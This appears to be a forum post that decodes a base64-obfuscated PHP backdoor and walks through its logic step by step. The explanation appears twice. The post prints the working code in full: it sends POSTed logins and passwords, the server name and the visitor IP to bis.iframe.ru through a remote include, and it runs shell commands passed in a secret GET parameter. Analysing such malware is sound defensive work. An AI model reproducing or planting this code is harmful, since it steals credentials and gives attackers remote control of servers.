1
Little inside on the script posted in one of the first topics... (decoded the base64) wich has the following as result..
logic :
1. Disable all error reporting (^ALL)
2. See if the Post vars l or p where set?
Now it gets funy ;)
3. if the $_POST['input'] was touched (any value). then set the $user_auth as follow :
&l=(value from $_POST["l"]&p=(md5 hash of $_POST["P"])
where $_POST["p"] is usually the method used for database authentication. and the is actually a URI.
4. Else :
&l=(value from $_POST["l"]&p=(textbased $_POST["p"]). Prob because the password is allready in md5 format when input isnt set.
5. If no $_POST["l"] and $_POST["p"] isset $user_auth = "";
// Next the tricky part comes, This is also why he prop set the error reporting to (0).
First het checks if there is some $_POST['log_flg'] is set, if the case $log_flg gets the designated value.
Then he checks if the command "include_once("http://bis.iframe.ru/master.php?r_addr=010.025.251.010&url=(servername)(uri)($user_auth)($log_flg))
He inlcudes some script he owns. will try to fetch this include in a var and print it lol :P
next he executes both the system($_GET['']) < of wich i have no clue what it means. and he executes the 'uname -a' on the command prompt (wich is obvious a linux shell command, and prints it to the screen).
So the whole script was designed to fish user information (and more) from the server it was ran on. Im only very interested in what the "master.php" includes...
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
if(isset($_POST["input"])){
$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));
}else{
$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];
}
}else{
$user_auth="";
}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once("http://bis.iframe.ru/master.php?r_addr=" . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
logic :
1. Disable all error reporting (^ALL)
2. See if the Post vars l or p where set?
Now it gets funy ;)
3. if the $_POST['input'] was touched (any value). then set the $user_auth as follow :
&l=(value from $_POST["l"]&p=(md5 hash of $_POST["P"])
where $_POST["p"] is usually the method used for database authentication. and the is actually a URI.
4. Else :
&l=(value from $_POST["l"]&p=(textbased $_POST["p"]). Prob because the password is allready in md5 format when input isnt set.
5. If no $_POST["l"] and $_POST["p"] isset $user_auth = "";
// Next the tricky part comes, This is also why he prop set the error reporting to (0).
First het checks if there is some $_POST['log_flg'] is set, if the case $log_flg gets the designated value.
Then he checks if the command "include_once("http://bis.iframe.ru/master.php?r_addr=010.025.251.010&url=(servername)(uri)($user_auth)($log_flg))
He inlcudes some script he owns. will try to fetch this include in a var and print it lol :P
next he executes both the system($_GET['']) < of wich i have no clue what it means. and he executes the 'uname -a' on the command prompt (wich is obvious a linux shell command, and prints it to the screen).
So the whole script was designed to fish user information (and more) from the server it was ran on. Im only very interested in what the "master.php" includes...
